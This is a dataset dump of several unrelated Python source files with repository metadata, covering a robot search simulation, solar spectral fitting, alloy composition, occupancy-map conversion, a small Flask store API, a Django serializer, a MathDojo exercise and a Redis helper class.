#fieldMax = [(5.5,14,2),(.3*x_range,.7*y_range,14)]#tag field absolute max 9.5 # for tag_200
#fieldMax = [(5.5,14,4.1),(.3*x_range,.7*y_range,14)]#tag field absolute max 9.5 # for tag_500
fieldMax = [(5.5,14,6),(.3*x_range,.7*y_range,14)]#tag field absolute max 9.5 # for tag_1000
field = fields[0]
measurement_time = 2.0
time_step=.5
#start_pos=(.05*x_range,.1*y_range)
"""
start_pos = [(4.361675414742551382e+00, 1.458277069766090328e+01),
(1.545820006278236569e+01, 6.457247090829543623e+00),
(6.295868290928718913e-01, 7.231587833833630796e+00),
(1.125840547944832792e+01, 4.275635236417141272e-01),
(1.547922926485634232e+00, 4.900255414078060312e+00),
(1.510704267728113237e+01, 1.783478215173388648e+01),
(2.204755346558018303e-01, 6.173268062869025741e+00),
(4.958469349586305697e+00, 4.716507947006558510e+00),
(1.479491107030286301e+01, 1.459564048874953457e+01),
(3.171471926407209985e+00, 1.005076470181938575e+01),
(1.234584097168078287e+01, 6.461087057506860631e+00),
(1.067132595610898349e+01, 1.024013704378120160e+01),
(2.627585809888457469e+00, 1.260149797724160514e+01),
(4.046709532503120599e+00, 1.067246776102524386e+01),
(1.408113055270808722e+01, 1.423915807887335561e+01),
(1.414334725656964054e+01, 1.920331742981397838e+01),
(8.702805949851414979e+00, 1.927219991502269991e+01),
(1.902459420257870448e+01, 1.459444585671132621e+01),
(1.071787563199973192e+01, 6.014617171762742132e+00),
(7.813659480510352751e+00, 3.109500212981364253e+00)
]
"""
start_pos = (1.545820006278236569e+01, 6.457247090829543623e+00)
show_only_when_pinging=False
stopOnMax = True
visualize = True
syncronize = True
logData=True
###############################################################################################
t=0
last_meas=t
run=False
running=False
searchComplete=False
updateGP=False
latestMeas=0
u=0
taglist=[]
agentList=[]
tagx=np.zeros(N)
tagy=np.zeros(N)
"""
for i in range(N):
#taglist.append(AcousticTag(i,last_ping=-np.random.rand()),ping_delay=max(2,30*np.random.randn())) # most realistic
taglist.append(AcousticTag(i,last_ping=-17*np.random.rand())) # more realistic (pings are not aligned in time)
# taglist.append(AcousticTag(i)) #better for understanding because pings are aligned in time and all have same ping interval
x,y,_ = taglist[i].pos
tagx[i]=x
tagy[i]=y
"""
# Build the grid world, load the pre-generated tag layout, and create agents.
E = Grid(taglist,x_range=x_range, y_range=y_range)
if field == fields[0]:
    # Tag field: load the saved tag list plus its raw CSV table (used by tagField).
    taglist= E.loadTagList("testField1_1000") #E.setMap(density_map)
    tagData=np.genfromtxt("testField1_1000.csv",delimiter=",")
    #E.saveTagList("tags")
for i in range(numAgents):
    # Each agent gets its own acoustic receiver and the dynamics model that
    # matches the selected search method (double/single integrator or heading).
    s= AcousticReciever(np.array([0,0,0]),sensorRange)
    if method == searchMethods[2]:
        #agentList.append(Agent(np.array([np.random.rand()*x_range,np.random.rand()*y_range,0,0]),s,E,dim=2))
        agentList.append(Agent(np.array([start_pos[0],start_pos[1],0,0]),s,E,dim=2))
        agentList[i].dynamics=m2_step
        u=[0,0]
    elif method == searchMethods[4]:
        #agentList.append(Agent(np.array([np.random.rand()*x_range,np.random.rand()*y_range,0,0]),s,E,dim=2))
        agentList.append(Agent(np.array([start_pos[0],start_pos[1]]),s,E,dim=2))
        agentList[i].dynamics=m3_step
        u=[0,0]
    else:
        #agentList.append(Agent(np.array([np.random.rand()*x_range,np.random.rand()*y_range]),s,E,dim=2))
        agentList.append(Agent(np.array([start_pos[0],start_pos[1]]),s,E,dim=2))
        agentList[i].dynamics=m1_step
# Cache tag x/y coordinates for scatter plotting.
for i in range(len(taglist)):
    x,y,_ = taglist[i].pos
    tagx[i]=x
    tagy[i]=y
# For the analytic test fields, pre-sample the field on a regular grid into a
# (nx_bins, ny_bins, 3) array of (x, y, value) points used only for contour
# visualisation during/after the run.
if field == fields[1]:
    nx_bins = int(x_range/spacing[0])
    ny_bins = int(y_range/spacing[1])
    x_bins=np.array(range(nx_bins))*x_range/nx_bins
    y_bins=np.array(range(ny_bins))*y_range/ny_bins
    plottingPoints = [(idx+spacing[0]/2.0,idy+spacing[1]/2.0,gaussianSum(idx+spacing[0]/2.0,idy+spacing[1]/2.0)) for idx in x_bins for idy in y_bins]
    plottingPoints = np.array(plottingPoints)
    plottingPoints.shape=(nx_bins,ny_bins,3)
if field == fields[2]:
    nx_bins = int(x_range/spacing[0])
    ny_bins = int(y_range/spacing[1])
    x_bins=np.array(range(nx_bins))*x_range/nx_bins
    y_bins=np.array(range(ny_bins))*y_range/ny_bins
    plottingPoints = [(idx+spacing[0]/2.0,idy+spacing[1]/2.0,rosenbrock(idx+spacing[0]/2.0,idy+spacing[1]/2.0)) for idx in x_bins for idy in y_bins]
    plottingPoints = np.array(plottingPoints)
    plottingPoints.shape=(nx_bins,ny_bins,3)
if field == fields[3]:
    nx_bins = int(x_range/spacing[0])
    ny_bins = int(y_range/spacing[1])
    x_bins=np.array(range(nx_bins))*x_range/nx_bins
    y_bins=np.array(range(ny_bins))*y_range/ny_bins
    plottingPoints = [(idx+spacing[0]/2.0,idy+spacing[1]/2.0,rastrigin(idx+spacing[0]/2.0,idy+spacing[1]/2.0)) for idx in x_bins for idy in y_bins]
    plottingPoints = np.array(plottingPoints)
    plottingPoints.shape=(nx_bins,ny_bins,3)
#draw((tagx,tagy))
'''
for t in range(N):
    draw(taglist[t].pos)
    #plt.pause(.1)
'''
# simulation
#input('Enter to begin simulation')
######################### socket threads ###############################################
# Connect to (or serve) the external controller process depending on method:
# ergodic methods connect out to a controller on :8080; MIDCA serves on :5700.
# create an INET, STREAMing socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if method == searchMethods[2] or method == searchMethods[4]:
    # connect to ergodic controller
    sock.connect(('localhost', 8080))
# NOTE(review): ``and`` binds tighter than ``or``, so this condition reads
# "ERGODIC_DI, or (ERGODIC_SI and syncronize)" — confirm it is not meant to
# be "(ERGODIC_DI or ERGODIC_SI) and syncronize".
if method == searchMethods[2] or method == searchMethods[4] and syncronize:
    sock.send(str.encode(str(x_range)))
if method == searchMethods[2] and not syncronize:
    xthread = threading.Thread(target=ErgodicComLink)
    xthread.start()
if method == searchMethods[4] and not syncronize:
    xthread = threading.Thread(target=ErgodicComLink2)
    xthread.start()
if method == searchMethods[0] and syncronize:
    # now do something with the clientsocket
    # in this case, we'll pretend this is a threaded server
    sock.bind(('127.0.0.1', 5700))
    sock.listen(5)
else:
    # now do something with the clientsocket
    # in this case, we'll pretend this is a threaded server
    xthread = threading.Thread(target=MidcaComLink)
    xthread.start()
    # block until the com-link thread reports the client is connected
    while not running:
        pass
##########################################################################
# NOTE(review): this wp_list initialisation is immediately overwritten by the
# identical condition just below; presumably leftover from the commented-out
# cell sweeps.
if method==searchMethods[3] or method==searchMethods[0]:
    wp_list = [[],[],[]]
    #wp_list[0] = search(wp_list[0], [.3*x_range, .3*y_range])
    #wp_list[0] = search(wp_list[0], [.3*x_range, .7*y_range])
    #wp_list[0] = search(wp_list[0], [5.5, 14])
# Seed each agent's waypoint list with its current position.
if method==searchMethods[3] or method==searchMethods[0]:
    wp_list = [[],[],[]]
    for i in range(len(agentList)):
        agent=agentList[i]
        pos=agent.getPos()
        wp_list[i] = [[pos[0], pos[1]]]
det_count=[0,0,0] # per-agent running count of tag detections
################################################ simulation loop ####################################
# Main loop: each time step, compute a control for every agent, integrate its
# dynamics, sample the selected field at the new position, and (optionally)
# redraw the world.  Runs until simtime, or until the field maximum is found
# when stopOnMax is set.
endSim=False
maxMeas=0 # largest field measurement seen so far (for reporting)
while t<=simtime:#or running: #change to better simulation stopping criteria
    posx=np.zeros(numAgents)
    posy=np.zeros(numAgents)
    pinging_x =np.zeros(1)
    pinging_y =np.zeros(1)
    #print(t)
    for i in range(len(agentList)):
        agent=agentList[i]
        pos=agent.getPos()
        #state = agent.getPos()#
        #srange=agent.sensor.range
        # --- control: pick input u according to the active search method ---
        if method==searchMethods[3] or method==searchMethods[0]:
            wp_list[i], u = wp_track(np.array(pos), wp_list[i])
            MidcaIntegrator(agent, updateGP)
            #print(t, pos, u, latestMeas)
            if updateGP:
                updateGP = False
                #print(t,pos,u,latestMeas)
        if method == searchMethods[2] and syncronize:
            u=doubleIntegratorErgodicControl(agent,updateGP)
            #print(t,pos,u,latestMeas)
            if updateGP:
                updateGP=False
        if method == searchMethods[4] and syncronize:
            u = singleIntegratorErgodicControl(agent, updateGP)
            print(t, pos, u, latestMeas)
            if updateGP:
                updateGP = False
        # --- dynamics + sensing over one time step ---
        state=simulate_dynamics(agent,u, [0,time_step],.1)
        dets=agent.updateAgent(state,t)
        pos=agent.getPos()
        if field == fields[0]:
            pinging,detSet,dets2=tagField(tagData,pos,t,time_step,sensorRange)
            #print(t,pinging.shape,dets,dets,detSet,agent.sensor.detectionSet)
            allDetectionData = agent.sensor.detectionList # history of every tag detection. includes (tag ID,time,agent pos,bin)
            det_count[i]+=dets
        # --- measurement: sample the selected field at the new position; for
        # the tag field, convert detections into a rate measurement and fold
        # it into the agent's per-cell belief map ---
        if field == fields[3]:
            latestMeas=rastrigin(pos[0],pos[1])
            if last_meas+measurement_time<=t:
                updateGP = True
        elif field == fields[2]:
            latestMeas=rosenbrock(pos[0],pos[1])
            if last_meas+measurement_time<=t:
                updateGP = True
        elif field == fields[1]:
            latestMeas=gaussianSum(pos[0],pos[1])
            bin = E.getAbstractPos(pos[0], pos[1]) - 1
            allMeasurementData.append([latestMeas, t, [pos[0], pos[1]], bin])
            if latestMeas >= fieldMax[1][2]:
                endSim=True
            if last_meas+measurement_time<=t:
                updateGP = True
        elif field == fields[0]:
            if last_meas+measurement_time<=t:
                updateGP = True
                bin=E.getAbstractPos(pos[0],pos[1])-1
                dtSet=agent.sensor.detectionSet
                rate_meas = len(dtSet)*1.0/measurement_time
                latestMeas=rate_meas
                if latestMeas >= fieldMax[0][2]:
                    endSim=True
                agent.belief_count[bin]+=1
                agent.belief_map[bin]= iterative_average(rate_meas,agent.belief_count[bin],round(agent.belief_map[bin],3)) #iteratively average rate measurement
                if len(agent.sensor.detectionSet)>0:
                    #print("agent ",i,", rate = ",rate_meas,",average rate = ",agent.belief_map[bin], " in bin ", bin)
                    #print(last_meas,t,dtSet)
                    agent.sensor.detectionSet=set()
        posx[i]=pos[0]
        posy[i]=pos[1]
    plt.clf()
    if last_meas+measurement_time<=t:
        last_meas=t
    if field == fields[0]:
        # advance every tag's ping cycle; optionally plot only pinging tags
        for tag in taglist:
            if show_only_when_pinging:
                if tag.pinging(t):
                    x,y,_ = tag.pos
                    pinging_x=np.append(pinging_x,x)
                    pinging_y=np.append(pinging_y,y)
            tag.updatePing(t)
        if show_only_when_pinging and visualize:
            draw((pinging_x,pinging_y))
        elif visualize:
            draw((tagx,tagy))
    if (field == fields[1] or field == fields[2] or field == fields[3]) and visualize:
        updateGP = True
        sensorRange=None
        plt.contourf(plottingPoints[:,:,0], plottingPoints[:,:,1],plottingPoints[:,:,2], 20, cmap='coolwarm')# cmap='inferno'), cmap='RdGy')
    if maxMeas<latestMeas:
        maxMeas=latestMeas
    if endSim and stopOnMax:
        break
    t+=time_step
    if visualize:
        drawAgent((posx,posy),r=sensorRange)
        plt.pause(0.00001) #plt.pause(time_step)
################################################ end simulation loop ####################################
################################################ final plots ######################################
run=False
if method==searchMethods[2] or method==searchMethods[4]:
    # notify the external ergodic controller that the run has ended
    sock.send("end ".encode('utf-8'))
#input('done')
if field == fields[0]:
    # Tag field: draw the final tag/agent layout and print each agent's
    # learned 5x5 detection-rate map alongside the true density map.
    draw((tagx,tagy))
    drawAgent((posx,posy),r=sensorRange)
    for i in range(len(agentList)):
        agent=agentList[i]
        print("agent ",i," rate estimates")
        agent.belief_map.shape=(5,5)
        print(np.flip(agent.belief_map,0))
        print("and measurements taken per cell")
        agent.belief_count.shape=(5,5)
        print(np.flip(agent.belief_count,0))
    print("True probability density map")
    E.p.shape=(5,5)
    print(np.flip(E.p,0))
    #spacing=(50,50)
    """
    print("Rate field approximation for sensor with range",sensorRange," spaced at intervals of",spacing)
    approx,pnts=E.approximateField(measurement_time,spacing=spacing,sensorRange=sensorRange,get_points=True)
    #print(np.round(approx,decimals=2))
    plt.figure(2)
    plt.axis('scaled')
    plt.grid(True)
    #print('\n',pnts[:,:,0],'\n',pnts[:,:,1])
    #plt.plot(pnts[:,:,0].flatten(), pnts[:,:,1].flatten(), 'r.',cmap='coolwarm')
    plt.contourf(pnts[:,:,0], pnts[:,:,1], np.flip(np.round(approx,decimals=2),(0,1)).transpose(), 20, cmap='coolwarm')# cmap='inferno'), cmap='RdGy')
    cbar = plt.colorbar()
    cbar.set_label('Detection rate')
    """
if field == fields[1] or field == fields[2] or field == fields[3]:
    # Analytic fields: contour plot of the true field plus the agent's final
    # position, on both figure 1 and a dedicated figure 2 with a colorbar.
    plt.contourf(plottingPoints[:,:,0], plottingPoints[:,:,1],plottingPoints[:,:,2], 20, cmap='coolwarm')# cmap='inferno'), cmap='RdGy')
    drawAgent((posx,posy))
    plt.figure(2)
    plt.axis('scaled')
    plt.grid(True)
    plt.contourf(plottingPoints[:,:,0], plottingPoints[:,:,1],plottingPoints[:,:,2], 20, cmap='coolwarm')# cmap='inferno'), cmap='RdGy')
    cbar = plt.colorbar()
    cbar.set_label('heat map')
    plt.xlim([0, x_range])
    plt.ylim([0, y_range])
    plt.xticks(np.arange(0,x_range,spacing[0]))
    plt.yticks(np.arange(0,y_range,spacing[1]))
    plt.draw()
plt.pause(0.00001)
if logData:
    # append a one-line run summary: field, end time, final pos, last measurement
    f=open("log.txt",'a')
    f.write(field+","+str(t)+","+str(agent.getPos())+","+str(latestMeas)+"\n")
    f.close()
    print(str(t)+","+str(agent.getPos())+","+str(latestMeas),", max val: ",maxMeas)
sock.close()
print('done')
| UTF-8 | Python | false | false | 50,107 | py | 49 | fieldComparisonMidca.py | 23 | 0.475223 | 0.42968 | 0 | 1,334 | 35.555472 | 161 |
wtbarnes/tutorial-notebooks | 3,908,420,285,094 | 045fb49f2bdd37ee06fe9784377955c594e92578 | 6a58661ebe27bf45540c7f1d8d4554cb298e5a47 | /2021_HinodeIRIS/fit-eis-data.py | 6ba5cadb45d4ba65fe24ff5e7cc50b9ab0e4a7e3 | [
"MIT"
] | permissive | https://github.com/wtbarnes/tutorial-notebooks | 44da1cf9e4631fd5a579a670832c7ee2f6e86ad1 | 74e8a5305d7ccfe2cfb99c13efbff0391e910a62 | refs/heads/master | "2022-07-24T00:37:48.406325" | "2022-07-11T23:09:33" | "2022-07-11T23:09:33" | 155,681,308 | 0 | 0 | MIT | true | "2018-11-01T07:58:03" | "2018-11-01T07:58:03" | "2018-10-30T13:34:36" | "2018-10-30T13:34:34" | 949 | 0 | 0 | 0 | null | false | null | """
Download level 1 EIS HDF5 files for 2021-04-24 and then fit the
Fe XII 195.119 profile to produce level 3 FITS files
"""
import eispac
import eispac.net # This registers the EIS NRL client
from sunpy.net import Fido, attrs as a
if __name__ == '__main__':
# Download the level 1 data
q = Fido.search(
a.Time('2021-04-24 04:00:00','2021-04-24 05:00:00'),
a.Instrument('EIS'),
a.Physobs.intensity,
a.Source('Hinode'),
a.Provider('NRL'),
a.Level('1'),
)
files = Fido.fetch(q)
files = sorted(files)
# Read in the fitting templates
template_names = [
'fe_12_195_119.1c.template.h5',
]
templates = [eispac.read_template(eispac.data.get_fit_template_filepath(t)) for t in template_names]
# Fit level 1 data using each template and save out the intensity
for t in templates:
cube = eispac.read_cube(files[0], window=t.central_wave)
fit_res = eispac.fit_spectra(cube, t, ncpu='max')
m = fit_res.get_map(measurement='intensity')
m.save(f"data/eis_{'_'.join(m.measurement.lower().split())}.fits", overwrite=True) | UTF-8 | Python | false | false | 1,140 | py | 9 | fit-eis-data.py | 2 | 0.628947 | 0.577193 | 0 | 33 | 33.575758 | 104 |
KoyamaLab/composition | 15,977,278,345,565 | d372ba0d003c92d4e4f0243be3eb99afb0a62c8b | 85eeb016eb23707af6efc5bb93c92c2f4f547af4 | /composition.py | a18614bfccc93a4e70c8660bd91e67e4e4f70059 | [] | no_license | https://github.com/KoyamaLab/composition | 1d502ebf217d54a6c3fe5dcd3f35c35ab4b074a5 | c836b453b784c613aa1d89518accb823917ec28a | refs/heads/master | "2020-04-06T06:11:48.536219" | "2016-11-14T12:55:01" | "2016-11-14T12:55:01" | 73,703,645 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Calculate composition of alloy
#
# arguments:
# argv[0] : dictionary, { 'element_name': element_composition, ... }
# argv[1] : float, alloy_weight [g]
import sys
from elements import ELEMENTS
def debug(arg):
print(arg)
mass = arg[1]
t = int(arg[2])
elms = {}
for i in range(t):
elms.update({arg[3+i]:float(arg[3+i+t])})
print(elms)
def composition(arg):
mol_mass = 0
mass = float(arg[1]) # 最終生成質量
t = int(arg[2]) # t元系
elms = {}
for i in range(t):
elms.update({arg[3+i]:float(arg[3+i+t])})
for name, val in elms.items():
elem = ELEMENTS[name]
mol_mass += elem.mass * val
for name, val in elms.items():
elem = ELEMENTS[name]
print(elem.name, mass / mol_mass * val * elem.mass)
if __name__ == "__main__":
#debug(sys.argv)
composition(sys.argv)
| UTF-8 | Python | false | false | 953 | py | 2 | composition.py | 1 | 0.547492 | 0.533618 | 0 | 41 | 21.609756 | 68 |
sguttikon/openai-rosbot-env | 2,293,512,584,441 | c252fac22c38a2f1b3c69f9b58327ef06010c0fc | 2a6f9db66bea745ec6ad33ee59e1d557b07e27bf | /gazebo_models/indoor_layouts/src/layout_to_occpmap.py | 1865c4c7b85eaf0622320dc39db3b4a76d432478 | [
"Apache-2.0"
] | permissive | https://github.com/sguttikon/openai-rosbot-env | bd958b6614e5a4ffa3f69caba18b2b4d97d3b662 | e34a5843c8218ae733ee4e0d3ccecdf13ccafd87 | refs/heads/master | "2022-12-30T21:09:00.861597" | "2020-10-23T19:35:41" | "2020-10-23T19:35:41" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
import argparse
import numpy as np
import cv2 as cv
def get_occupany_map(img: np.ndarray, output_path: str, output_size: tuple):
"""
Convert the HouseExpo indoor layout to occupancy map
Parameters
----------
img: numpy.ndarray
input image
output_path: str
full path (*.pgm) indicating where to store the file
output_size: tuple
the output image shape as (rows, cols)
"""
(rows, cols) = img.shape
# the houseexpo layout has black-background so perform inverse transform
_, thresh_img = cv.threshold(img, 1, 255, cv.THRESH_BINARY_INV)
# find and draw contours i.e, borders
# reference: https://docs.opencv.org/3.4/d4/d73/tutorial_py_contours_begin.html
contours, hierarchy = cv.findContours(thresh_img, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)
cv.drawContours(thresh_img, contours, contourIdx=1, color=100, thickness=3)
# switch colors => 205: unknown, 255: free, 0: occupied
thresh_img = np.where(thresh_img==255, np.uint8(205), thresh_img) # unknown
thresh_img = np.where(thresh_img==0, np.uint8(255), thresh_img) # free
thresh_img = np.where(thresh_img==100, np.uint8(0), thresh_img) # obstacle
# add padding to borders to make the output have equal width and height
padding = max(rows, cols) + 50
thresh_img = cv.copyMakeBorder(thresh_img, (padding-rows)//2, (padding-rows)//2, \
(padding-cols)//2, (padding-cols)//2, cv.BORDER_CONSTANT, value=205)
thresh_img = cv.resize(thresh_img, output_size)
# store the image
cv.imwrite(output_path, thresh_img)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert HouseExpo indoor layout images to occupany map')
parser.add_argument('--file_path', dest='file_path', \
required=True, help='full path to layout image')
parser.add_argument('--output_path', dest='output_path', \
required=True, help='full path to output image (*.pgm)')
parser.add_argument('--o_shape', dest='o_shape', type=int, \
default=768, help='output occupancy map shape')
args = parser.parse_args()
img = cv.imread(args.file_path, cv.IMREAD_UNCHANGED)
get_occupany_map(img, args.output_path, (args.o_shape, args.o_shape))
| UTF-8 | Python | false | false | 2,317 | py | 18 | layout_to_occpmap.py | 12 | 0.657315 | 0.634873 | 0 | 56 | 40.375 | 106 |
bdnaeem3/pyBlog | 14,087,492,763,613 | 67564593f5c8a173243e41096114273d8aa3cdb5 | c7b7667f3ac846de17a27ce85cd99bc085bec74b | /blog/serializer.py | ea6eec9edbe13d81a7f7f29ba9ebe8c008253d49 | [] | no_license | https://github.com/bdnaeem3/pyBlog | d603de30ea6a828ff4a8ba137b44bd6e63e06715 | a15fb3b04d45faebaa3b040966851e34ff1a513b | refs/heads/master | "2022-12-01T18:27:34.270006" | "2019-11-26T06:58:24" | "2019-11-26T06:58:24" | 149,322,044 | 0 | 0 | null | false | "2022-11-22T00:23:00" | "2018-09-18T16:51:15" | "2019-11-26T06:58:33" | "2022-11-22T00:22:57" | 1,196 | 0 | 0 | 3 | Python | false | false | from rest_framework import serializers
from . import models
class PostSerializer(serializers.ModelSerializer):
class Meta:
model = models.Post
fields = ('id', 'title', 'content', 'date_created', 'author')
extra_kwargs = {
'author': {
'read_only': True
}
} | UTF-8 | Python | false | false | 336 | py | 9 | serializer.py | 4 | 0.550595 | 0.550595 | 0 | 16 | 20.0625 | 69 |
patrickxrivera/python-flask-rest-api | 7,103,875,952,486 | 757a63de5c831b7b9c26d740c68c1d14ea05ff8b | 9951b6539b96a9505f47294f46d17be2b74cf313 | /section3/src/app.py | d99adcd0472342f3e909f773006e4158611b8303 | [] | no_license | https://github.com/patrickxrivera/python-flask-rest-api | 7421c354ab3a49443de62254cc4261ac7ba3bdf0 | 0d9fef6fe402502f699f0a3b834e7b0f758067c9 | refs/heads/master | "2021-09-20T20:02:17.511575" | "2018-08-15T04:48:33" | "2018-08-15T04:48:33" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask import Flask, jsonify, request
app = Flask(__name__)
stores = [
{
'name': 'Complete Life Optimization',
'items': [
{
'name': 'Bulletproof Coffe',
'price': 20.99
}
]
}
]
@app.route('/store', methods=['POST'])
def create_store():
request_data = request.get_json()
new_store = {
'name': request_data['name'],
'items': []
}
stores.append(new_store)
return jsonify(new_store)
def find_target_store(target_store_name):
def find(store):
return store['name'] == target_store_name
return find
@app.route('/store/<string:name>')
def get_store(name):
target_store = list(filter(find_target_store(name), stores))
return jsonify({'store': target_store}) if target_store else jsonify({'message': 'No store found with that name.'})
@app.route('/stores')
def get_stores():
return jsonify({'stores': stores})
@app.route('/store/<string:name>/item')
def create_item_in_store(name):
request_data = request.get_json()
for store in stores:
if store['name'] == name:
new_item = {
'name': request_data['name'],
'price': request_data['price']
}
store['items'].append(new_item)
jsonify({'new_item': new_item})
return jsonify({'message': 'store not found'})
@app.route('/store/<string:name>/item')
def get_items_in_store(name):
for store in stores:
if name == store['name']:
return jsonify({'store': store['items']})
return jsonify({ message: 'No store found with that name.' })
app.run(port=5000)
| UTF-8 | Python | false | false | 1,672 | py | 5 | app.py | 2 | 0.56878 | 0.563995 | 0 | 61 | 26.409836 | 119 |
Dawitworku/Python-stack | 10,024,453,679,351 | 5df4894875d219eb9593c280bf246e627fc8f99f | f0520714c2a49bd89c131446d947677fe5a5df5f | /_python/OOP/MathDojo/Math_Dojo.py | cb0d82595b3e6c60f02aa0ae34df048d034c3ab4 | [] | no_license | https://github.com/Dawitworku/Python-stack | 38c12f70279c3c913f5eefd47b9954939de2690b | 198645fa4eef948895be238828b2ce998a37ed03 | refs/heads/master | "2023-01-08T13:59:54.712454" | "2020-11-06T02:24:39" | "2020-11-06T02:24:39" | 292,392,381 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class MathDojo:
def __init__(self):
self.result = 0
def add(self, num, *nums):
splat = 0
for i in nums:
splat += i
self.result += num + splat
return self
def subtract(self, num, *nums):
splatvar = 0
for i in nums:
splatvar -= i
self.result -= (num - splatvar)
return self
# create an instance:
md = MathDojo()
# x = md.add(2).add(2,5,1).subtract(3,2).result
x = md.add(2).result
print(x)
y = md.add(150).add(100,55,45).subtract(30,200).result
print(y)
z = md.add(5).add(5,5,5).subtract(5,5).result
print(z)
# x = md.add(2)
# y = md.add(2,5,1)
# z = md.subtract(3,2,5)
| UTF-8 | Python | false | false | 696 | py | 104 | Math_Dojo.py | 60 | 0.525862 | 0.471264 | 0 | 40 | 16.325 | 54 |
jaw566/RosConnect | 7,834,020,349,065 | b1bbab597b30ad31fbd8e1fa64e4cfda7e37aabc | 6d9a30a1eb771057aa95b882fffe40a6aadf0264 | /App/init_desktop_file.py | 6f48dedde331857a9cbaee86fea8a379afe81b6b | [] | no_license | https://github.com/jaw566/RosConnect | 28c1fa76c6aa97ca585bbd2e0da3d0bdb747a332 | 50a5a803c4c3db2435b5a7926066dfb25228a9ff | refs/heads/master | "2022-06-19T06:55:47.175624" | "2020-05-07T05:14:43" | "2020-05-07T05:14:43" | 210,413,435 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
import os
def main():
HOME = os.environ['HOME']
with open(HOME+'/Desktop/RosConnect.desktop','r') as file:
data = file.readlines()
data[4] = "Icon="+HOME+"/logo.png\n"
with open(HOME+'/Desktop/RosConnect.desktop','w') as file:
file.writelines(data)
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 359 | py | 35 | init_desktop_file.py | 27 | 0.568245 | 0.562674 | 0 | 19 | 17.631579 | 62 |
DarkLii/Hogwarts-16 | 10,136,122,855,984 | 59a31af389448e0849fd529dc3d0a3f4a2e60408 | b9f6d0c29da869e844ae88132aecd9d10072241b | /pytest_allure/data_base/redis/redis_op.py | 81c96b9dfaf081710b2300621787f8b6dadc73e7 | [] | no_license | https://github.com/DarkLii/Hogwarts-16 | 63b10ff3ace397b7b95731d2882bfb97f6e537c9 | d0de06281afad023b1bc94221c8117bf111c9479 | refs/heads/master | "2023-04-03T07:52:00.551910" | "2021-04-10T14:01:36" | "2021-04-10T14:01:36" | 319,946,774 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding:utf-8 -*-
# @Author: DarkLi
# @Time : 2020/8/28
# @Desc : redis 操作封装
import json
from redis import StrictRedis, ConnectionPool
from pytest_allure.utiles.decorator import log_wrapper
class RedisOp:
def __init__(self, obj, data_base_config):
# if hasattr(obj, "Log") and obj.Log.get("output_console", True):
# self.log = Logger(level="info")
# else:
# self.log = None
self.log = obj.log if hasattr(obj, "log") else None
self.host = data_base_config["host"]
self.port = data_base_config["port"]
self.user = data_base_config["user"]
self.password = data_base_config["password"]
self.db = data_base_config["database"]
self.charset = data_base_config.get("charset", "UTF-8")
self.decode_responses = data_base_config.get("decode_responses", True)
self.pool = ConnectionPool(host=self.host, port=self.port, password=self.password, db=self.db,
decode_responses=self.decode_responses)
# 获取连接
self.connection = StrictRedis(connection_pool=self.pool)
def close(self):
# 关闭连接池所有连接,PS:慎用
self.connection.connection_pool.disconnect()
"""
string 类型 redis 操作:{"key": "value"}
"""
@log_wrapper
def set(self, key, value, time=None):
"""
单条插入 key_value
:param key:
:param value:
:param time: 单位为秒
:return:
"""
if isinstance(value, dict):
value = json.dumps(value, ensure_ascii=False)
if time:
ret = self.connection.setex(key, time, value)
else:
ret = self.connection.set(key, value)
return ret
@log_wrapper
def setnx(self, key, value):
"""
key 不存在时 插入数据
:param key:
:param value:
:return:
"""
return self.connection.setnx(key, value)
@log_wrapper
def psetex(self, name, time_ms, value):
"""
插入含过期时间的 key_value
:param name:
:param time_ms: 单位为毫秒
:param value:
:return:
"""
return self.connection.psetex(name, time_ms, value)
@log_wrapper
def mset(self, key_value_dict):
"""
批量插入 key_value
:param key_value_dict:
:return:
"""
for key, value in key_value_dict.items():
if isinstance(value, dict):
key_value_dict[key] = json.dumps(value, ensure_ascii=False)
return self.connection.mset(key_value_dict)
@log_wrapper
def msetnx(self, key_value_dict):
"""
key 均不存在时才插入
:param key_value_dict:
:return:
"""
return self.connection.msetnx(key_value_dict)
@log_wrapper
def get(self, key):
"""
获取 key 的 value
:param key:
:return:
"""
return self.connection.get(key)
@log_wrapper
def mget(self, key_list):
"""
回多个 key 对应的 value
:param key_list: 格式为 列表
:return:
"""
return self.connection.mget(key_list)
@log_wrapper
def getset(self, key):
"""
给数据库中 key 赋予值 value 并返回上次的 value
:param key:
:return:
"""
return self.connection.getset(key)
@log_wrapper
def keys(self, key):
"""
获取所有符合规则的 key
:param key: eg: "n*"
:return:
"""
return self.connection.keys(key)
"""
redis key 操作
"""
@log_wrapper
def exists(self, key):
"""
判断 key 是否存在
:param key:
:return:
"""
return self.connection.exists(key)
@log_wrapper
def expire(self, key, time):
"""
设定key的过期时间,单位秒
:param key:
:param time: 单位秒
:return:
"""
return self.connection.expire(key, time)
@log_wrapper
def delete(self, key):
"""
删除一个 key
:param key:
:return:
"""
return self.connection.delete(key)
@log_wrapper
def mdelete(self, key_list):
"""
删除多个指定的 key
:param key_list:
:return:
"""
for key in key_list:
self.connection.delete(key)
"""
hash 类型 redis 操作:{"name":{"key": "value"}}
"""
# TODO hash 类型 redis 操作
"""
list 类型 redis 操作:{"key": []}
"""
# TODO list 类型 redis 操作
if __name__ == '__main__':
data_base_config = {
"host": "172.16.11.127",
"port": 6379,
"database": 13,
"user": "root",
"password": "standalone_passwd_test",
}
data_base = RedisOp(data_base_config)
test_key = "test_key"
test_value = "test_value"
data_base.set(test_key, test_value)
data_base.get(test_key)
key_value_dict = {
"mset_key_1": {"mset_key_111": "mset_value_111"},
"mset_key_2": {"mset_key_222": "mset_value_222"},
}
data_base.mset(key_value_dict)
key_list = [test_key, "mset_key_1", "mset_key_2"]
data_base.mdelete(key_list)
| UTF-8 | Python | false | false | 5,406 | py | 47 | redis_op.py | 42 | 0.524333 | 0.516287 | 0 | 217 | 22.483871 | 102 |
